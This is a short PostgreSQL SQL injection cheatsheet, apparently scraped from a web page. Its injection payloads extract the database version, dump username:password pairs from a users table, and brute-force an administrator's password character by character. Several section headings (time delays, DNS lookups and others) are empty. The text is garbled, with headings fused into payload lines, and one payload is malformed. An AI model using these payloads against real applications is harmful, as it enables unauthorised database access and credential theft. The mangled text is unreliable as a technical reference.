Basic PostgreSQL injection Cheatsheet
Retreaving Database version
SELECT version()' UNION SELECT NULL, version() -- -String Concatenation
SELECT username||':'||password FROM users' UNION SELECT NULL,username||':'||password) FROM users-- -Substring
SELECT SUBSTRING(password, 2,1) FROM users where username = 'administrator'' AND SELECT SUBSTRING((SELECT Password FROM Users Where Username = 'Administrator'),1,1) = FUZZComments
Conditional Errors
Time Delays
DNS Lookups
Database Contents
Last updated